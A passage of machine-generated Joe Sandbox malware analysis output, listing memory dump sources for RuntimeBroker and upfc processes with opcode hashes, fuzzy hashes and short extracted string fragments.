                                • Opcode Fuzzy Hash: f4801156bbce5df0b5c6c10c682d22bfe4ea4dfb296037fc788a2b4cf71e8952
                                • Instruction Fuzzy Hash: ED518EA3B1F6951BE76257ED2C210A87B50FF4566071502F7E098870F7FC16AA068BC1
                                Strings
                                Memory Dump Source
                                • Source File: 00000019.00000002.1766559723.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?L_I$L_^J$L_^K$L_^f$L_^g
                                • API String ID: 0-841158015
                                • Opcode ID: 699f3f4d504d7e448c560192c95e249343456fd478254dd19af2af204ed72d29
                                • Instruction ID: 3c620171f82a6507c1976114c3ab05e2619944930ccd4038ad59ac6de986fbe3
                                • Opcode Fuzzy Hash: 699f3f4d504d7e448c560192c95e249343456fd478254dd19af2af204ed72d29
                                • Instruction Fuzzy Hash: 46519BA3B1F6990BE72617FD2C210B87750FF8566071506F7D098860E7F816AA068BC1
                                Strings
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b885000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID: "$"$-$[$]${$}
                                • API String ID: 0-2220975799
                                • Opcode ID: de2ae8f64f0a4fa1f2ea1d4bf198704dc24f33dcae20cfe0bee857e1363f8ac5
                                • Instruction ID: b2af73fa5cc8b6854275fdf79221039ddbff477ba7cabc50a078592d6fb4339f
                                • Opcode Fuzzy Hash: de2ae8f64f0a4fa1f2ea1d4bf198704dc24f33dcae20cfe0bee857e1363f8ac5
                                • Instruction Fuzzy Hash: 0642F770E1962D8FDBA8DF68C8A0BEDB7B1FF58301F5041A9D05DA7295DA385A81CF40
                                Strings
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID: =O_^$?O_I$O_^X$O_^f$O_^g
                                • API String ID: 0-2229697781
                                • Opcode ID: 56cc2341499588085a09a7b8df7d8cab37e19a38ced7b1f23c1be1877e21e17d
                                • Instruction ID: fbf69256339e3b5e536ce2b5ae9f784af813cbeed2d22d4396df743b16a04d68
                                • Opcode Fuzzy Hash: 56cc2341499588085a09a7b8df7d8cab37e19a38ced7b1f23c1be1877e21e17d
                                • Instruction Fuzzy Hash: E5618B63B0FA895FEB21679C7C651E83BA0FF85721B0501F7E06C8B1A7EC2469468381
                                Strings
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?O_^
                                • API String ID: 0-1127923838
                                • Opcode ID: ef945f1706b72cf49d13fc5cc5572387a099ee51a8e78cabce076d5f4f9d5d45
                                • Instruction ID: bb51e7dd59e50f40135fd3801b95d70a1a48146bff9db65f52470e26cb1b2de1
                                • Opcode Fuzzy Hash: ef945f1706b72cf49d13fc5cc5572387a099ee51a8e78cabce076d5f4f9d5d45
                                • Instruction Fuzzy Hash: 5301D231A0A65E8FC756EF6898A15F637A0FF05318F04017AE06CCA193EE38A555C791
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5ae674243f1d554a8079076d9a8941308ff9d3c1027d4da7409e95daaa2f6bc4
                                • Instruction ID: cc33624e63c8a795ed916fe0597753e52f242293ae017d1f46691da0bc5a88ff
                                • Opcode Fuzzy Hash: 5ae674243f1d554a8079076d9a8941308ff9d3c1027d4da7409e95daaa2f6bc4
                                • Instruction Fuzzy Hash: 7051C031B18A8E4FDB58DF1888645BA77E2FF9C304B15417EE46EC7292DE34E9028781
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 560e0246001dc2aa6563182902685101808f3b659950fc0c388b1228830068c0
                                • Instruction ID: f7265e2cbb0f54c24ec97903a3b5348035567ebd98c9c27d109c1ad97466bcd2
                                • Opcode Fuzzy Hash: 560e0246001dc2aa6563182902685101808f3b659950fc0c388b1228830068c0
                                • Instruction Fuzzy Hash: 0E513071A1995D8FDB94EF98C865AECBBF1FF59300F41016AE01DE72A2CA74A941CB40
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2b89370e2952cc273fd3db967a1130128942482fd146c274e563e831a05ae1f7
                                • Instruction ID: e42320d363b096e4bc3dc24d4f0cb25a7be45edd2e246bc79bc0301f27b7d00e
                                • Opcode Fuzzy Hash: 2b89370e2952cc273fd3db967a1130128942482fd146c274e563e831a05ae1f7
                                • Instruction Fuzzy Hash: EF51C661A0EA994FE7A29BA88C757A87BA0EF59300F0540F7D09CC71E7DE346A85C741
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b885000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 32e2d9b639845a432b1c176571f1de4048dba24c288be9898b326255259af0ff
                                • Instruction ID: 379cf16fca9f92da17b3547fca1c4c74dba3c2816229b7487d8cb65abaab4337
                                • Opcode Fuzzy Hash: 32e2d9b639845a432b1c176571f1de4048dba24c288be9898b326255259af0ff
                                • Instruction Fuzzy Hash: 08410E71E0995D8FDF94EFA8C899AACB7F1FF68300F500169D01DE7295DA35A881CB40
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2957f27167f2bcdf61b10592efc8bd3d800d2879cb405db88ff17afee2cac51a
                                • Instruction ID: cfecb87381bc0584b196ba68d82882aaf02ce97d1dba5682117e0c51c367ed29
                                • Opcode Fuzzy Hash: 2957f27167f2bcdf61b10592efc8bd3d800d2879cb405db88ff17afee2cac51a
                                • Instruction Fuzzy Hash: E8317530E1EA1D8BE774BB9494227F8B2A1FF4D700F410279D06E921E5CF396A45C680
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d16359f228bdb3969814395be0c53b7d71179ac7f0f83864d6bd59b1a879caeb
                                • Instruction ID: 53bf48a4f359340d78f95853557eeab990c54e9a212afc8502ef1c7bfb0e8cad
                                • Opcode Fuzzy Hash: d16359f228bdb3969814395be0c53b7d71179ac7f0f83864d6bd59b1a879caeb
                                • Instruction Fuzzy Hash: C4415D71E09A1D8FDB54EB98D8A4AECBBF1FF58301F4105AAD019E72A1DB34A945CB40
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b885000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4b75472d4123a5b4f219406e72c24893f29335d708b5de1d6bf8055691a1668c
                                • Instruction ID: a204d0aaf2a2c23a8a4e3ac2c9cd1149fc186e2f5ca729f59c34781e06fe16fe
                                • Opcode Fuzzy Hash: 4b75472d4123a5b4f219406e72c24893f29335d708b5de1d6bf8055691a1668c
                                • Instruction Fuzzy Hash: 1B416B70E14A4D8FDB84EBE8D865AEDBBB1FF48310F01017AE018E3296DA346941CB91
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b885000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b067d67ccd6209622ddc1919439d2991d008abf8c2da5911cefd04ea3903e60c
                                • Instruction ID: 44c1094fffcf5f15d91a103e97198c680e4614faa2bce6f54bb05a93befacff5
                                • Opcode Fuzzy Hash: b067d67ccd6209622ddc1919439d2991d008abf8c2da5911cefd04ea3903e60c
                                • Instruction Fuzzy Hash: 4F418070D0965D8FEB55DFA4C864AEDB7B1FF49300F1101BAD019D729ACB399981CB41
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b885000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 91db70d23fc450e3a47a1947954966a9495405788ce3e84d748f27718fb9bec3
                                • Instruction ID: 5fe3c7129db08f1c759bdcece56beb96e51ce051532f3f34c55a72b7d8434529
                                • Opcode Fuzzy Hash: 91db70d23fc450e3a47a1947954966a9495405788ce3e84d748f27718fb9bec3
                                • Instruction Fuzzy Hash: DC314832E0961E8FDB68DFA4D4646FEB7B1EF58300F11017AE019E32D1CA396A41CB91
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fc185f058d767cbb7c1ee79f7c8e1c4cd1c93d7f105ed7790855777bab793855
                                • Instruction ID: 505111a99b68d92cd3c248e9f266e661c3c682d7a4c37cfa385b5f6dd85bedd8
                                • Opcode Fuzzy Hash: fc185f058d767cbb7c1ee79f7c8e1c4cd1c93d7f105ed7790855777bab793855
                                • Instruction Fuzzy Hash: 1B312A70D0A64D8FDB55DFA8D8646EDB7B1FF59300F10047AE019E3291DB389940CB81
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: de39de14fee2e75c82637a27dbb38b2e033e3f5d5bb42a5a9f8f4517d4c5b471
                                • Instruction ID: 4e7380405c5fa0d7a0b30fd0c10e7661c7191ef7aeee2f6f53402d1a05b7253a
                                • Opcode Fuzzy Hash: de39de14fee2e75c82637a27dbb38b2e033e3f5d5bb42a5a9f8f4517d4c5b471
                                • Instruction Fuzzy Hash: A7110D31E5A92D8FD768EBA0D4617FCB271FF0A701F4114B9D05EA6192CE396A44CB40
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 222091d1120c8d62e108a3a8dffb55b1310ac6a74ce8f86f5ac3c00494b3defa
                                • Instruction ID: 58c9e0821d2093b086eb9c4bec6188d0cd1290774a073216d2ec19ca0c3af4d7
                                • Opcode Fuzzy Hash: 222091d1120c8d62e108a3a8dffb55b1310ac6a74ce8f86f5ac3c00494b3defa
                                • Instruction Fuzzy Hash: 7C119131F1591E8BDB68EB94D8657EDB362FF45300F81027AD029AB1A5DE347A458B80
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 931567016a469b63757011ce7a5d2022d99321a3509613ae9138ffe701228a4f
                                • Instruction ID: c399640902d6f64b70c31bb751c5d889b3d10672d191a37726cc1da0b7b0fbd9
                                • Opcode Fuzzy Hash: 931567016a469b63757011ce7a5d2022d99321a3509613ae9138ffe701228a4f
                                • Instruction Fuzzy Hash: E1F02231A09A4D9FD794EB6888A95EC7FB0FF89300F8101FAD018C31A6DF382A95C741
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ccf53f3e698806166ad59005aa15451cdcb4ae5bd1117c288df1d4b20541a080
                                • Instruction ID: 19bf1ec8b6fb3dbeef40b56c62a4054f801c621c7b170205e7635b2d22776f9c
                                • Opcode Fuzzy Hash: ccf53f3e698806166ad59005aa15451cdcb4ae5bd1117c288df1d4b20541a080
                                • Instruction Fuzzy Hash: 89F02831D0EA4D4FD714EB6888655EC7FA0EF48200F4501F5D429C60E2EF386D46C301
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6cf023c0c0500aafec59294204d6e0598ff1e6f4cab11a043e4aef4893e4baaa
                                • Instruction ID: bcf24a5dc90924ff5e98082d103c336fa76c56cd22bf18f8858ea18e1c065664
                                • Opcode Fuzzy Hash: 6cf023c0c0500aafec59294204d6e0598ff1e6f4cab11a043e4aef4893e4baaa
                                • Instruction Fuzzy Hash: CEF0BE3050E64D8FCB66EF14C8556E93BA0FF5A300F0601AAE41CC71A2CB7ADA64CB81
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b885000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2d04b37a7352b28d701c463d5b1755cb2f1aeea1468404ea1e7c46b95697a55b
                                • Instruction ID: 437673ff52f25dc9e5d84addf058de7c718753d71cebfc0fa07981ef6f5f75df
                                • Opcode Fuzzy Hash: 2d04b37a7352b28d701c463d5b1755cb2f1aeea1468404ea1e7c46b95697a55b
                                • Instruction Fuzzy Hash: 8CF03C3091DA8D8FDB51EB6888686ED7FF0FF19304F4504A7D458D60A2D7389544CB41
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4b906e38aa76fef87d61cd7d8d8787a966b601081a24293271e4852abc45e926
                                • Instruction ID: e6f277bfdbd44c6b49878375b8cf172483cecaccf1affced6d632e91666cb1a1
                                • Opcode Fuzzy Hash: 4b906e38aa76fef87d61cd7d8d8787a966b601081a24293271e4852abc45e926
                                • Instruction Fuzzy Hash: D6F05E30509A0E8FDB65EF5494116E577A0FF59304F000176E42CD6196CA35A660C781
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b885000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 684e947d3b0f97777c6dac990f4c2b4ffc138e757008c94602e787385176f5a0
                                • Instruction ID: 61377d79ac162976e87490f508ceecd4766b034370dbb9cee9c3091ebeb45a03
                                • Opcode Fuzzy Hash: 684e947d3b0f97777c6dac990f4c2b4ffc138e757008c94602e787385176f5a0
                                • Instruction Fuzzy Hash: 1CE0D875989D4CCBCB649B599C5029477B1FB4D304F01026DE45CC7191D7355E56C301
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b885000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d31636a8ad0cc4e7ae7561114b7b8ef60b1c97d70ef0d9cddb78f85d3628a5a7
                                • Instruction ID: fdcc27c5cec694ea759e9b6e237a40e219626e3a4e5591844828d89103f0611b
                                • Opcode Fuzzy Hash: d31636a8ad0cc4e7ae7561114b7b8ef60b1c97d70ef0d9cddb78f85d3628a5a7
                                • Instruction Fuzzy Hash: 23E06F32A0AE0C8BCB60AF98ACA028833A0FB8C308F01026AE45CC7180D3316A84C302
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e1466cc37be4747d1c03cf260fd570b266d3f876cb9d60936201b393657f7046
                                • Instruction ID: c3b67f0477bc8078d90c3d9f6a03a0dbe0e803dc6fb174bfdf36870062390c4a
                                • Opcode Fuzzy Hash: e1466cc37be4747d1c03cf260fd570b266d3f876cb9d60936201b393657f7046
                                • Instruction Fuzzy Hash: F0E09231C4FA8E4FD7216F6489661E97B60FF0A700F0616BAD06886092DB7C9628C741
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7aafd240f82503a18d954fe83f1fda596be78c069d652a47f022fbc4134a1402
                                • Instruction ID: efa91c2ae656b92b4a86e1885715b473e92c9d06697392523168f69425bc3470
                                • Opcode Fuzzy Hash: 7aafd240f82503a18d954fe83f1fda596be78c069d652a47f022fbc4134a1402
                                • Instruction Fuzzy Hash: 3FE0A03184F78D4FD7626B6448611D57B70FF0A700F0A15A6D068C60A2DA6896588302
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 59d503f4a01e94016d3a10f0d00671b5c8829c795b1f8038d9be554b43a3a3c4
                                • Instruction ID: ae2388c24174c1af2598202f221d7952a23a7228175f5152aebbfb41b755a1e7
                                • Opcode Fuzzy Hash: 59d503f4a01e94016d3a10f0d00671b5c8829c795b1f8038d9be554b43a3a3c4
                                • Instruction Fuzzy Hash: 50F09E71A5495E4FDFA4EF58C894BA9B3B1FB58340F1086E6901DE3255DA30AEC58F80
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4052877536065a422ffdacf6b0f575e94888fbc971f21f8d59286a0c27209402
                                • Instruction ID: c7f4516cd99f28ee773ec3fcc90fa90195b457c14083bdfba21257d30318141a
                                • Opcode Fuzzy Hash: 4052877536065a422ffdacf6b0f575e94888fbc971f21f8d59286a0c27209402
                                • Instruction Fuzzy Hash: D0E04F30509A0ECFDBA4EF58C4506A677A1FF5C304F100539E42CD6190CB35E6A0CB80
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e67d66c268693f67aeb18f4924518817eb4d892f8e90b87f589e7369a8b13f1a
                                • Instruction ID: 7a150a5b6507382244494256046957d30d0be3c1350848b34f0941929a2da255
                                • Opcode Fuzzy Hash: e67d66c268693f67aeb18f4924518817eb4d892f8e90b87f589e7369a8b13f1a
                                • Instruction Fuzzy Hash: 88D0E231F0592D8ECB64EA88E8107EDB771EF89311F8002B6C11DE3199CA306E428B81
                                Strings
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID: =O_^$?O_I$O_^U$O_^X$O_^f$O_^g
                                • API String ID: 0-1252858796
                                Strings
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?O_I$O_^J$O_^K$O_^f$O_^g
                                • API String ID: 0-2965963803
                                Strings
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b895000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID: "$"$-$[$]${$}
                                • API String ID: 0-2220975799
                                Strings
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b890000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID: =N_^$?N_I$N_^U$N_^X$N_^f$N_^g
                                • API String ID: 0-893460077
                                Strings
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b890000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID: =N_^$?N_I$N_^X$N_^f$N_^g
                                • API String ID: 0-3255808656
                                Strings
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b890000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?N_I$N_^J$N_^K$N_^f$N_^g
                                • API String ID: 0-3465608391
                                • Opcode ID: 5aac7501c62e9f7051f76aea91315eb6b6d529c3852120bb78a4e075c18896c5
                                • Instruction ID: 3671b5f1aa899d9411c431b52a8ad4ff644f9bf5dc4428debba94520f8aded44
                                • Opcode Fuzzy Hash: 5aac7501c62e9f7051f76aea91315eb6b6d529c3852120bb78a4e075c18896c5
                                • Instruction Fuzzy Hash: 8A61CB63B0F6895BEB2197EC6CA40E87FA1FF45760B1505FBD198C70E7E815A90683C1
                                Strings
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b890000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?N_^
                                • API String ID: 0-1123592777
                                • Opcode ID: 51e81d4849876f32a41880f804a9495f014ca7c8d52d46b4f1c0e7742f804346
                                • Instruction ID: f81a0918c252fd9d7bca808ca4fb4401466ed33aac772872a09b32639ecbfd15
                                • Opcode Fuzzy Hash: 51e81d4849876f32a41880f804a9495f014ca7c8d52d46b4f1c0e7742f804346
                                • Instruction Fuzzy Hash: 7401D231A0D25E9FDB56EFA898A15F67BA0EF05308F0401BAE05CC6093EA68A551C781
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b890000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5c5231560197a157e1435a6f4a6408d763a61ff83ac638195a8b783ecde77de8
                                • Instruction ID: de80653e765045f43532d634ff927bfaa3ef6991ce3a351c72be6ccd64f29e74
                                • Opcode Fuzzy Hash: 5c5231560197a157e1435a6f4a6408d763a61ff83ac638195a8b783ecde77de8
                                • Instruction Fuzzy Hash: 70D13D71E1965D8FDBACDB58D8A4BA8BBB1FF58300F4441B9D00DE32E6DA356981CB01
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false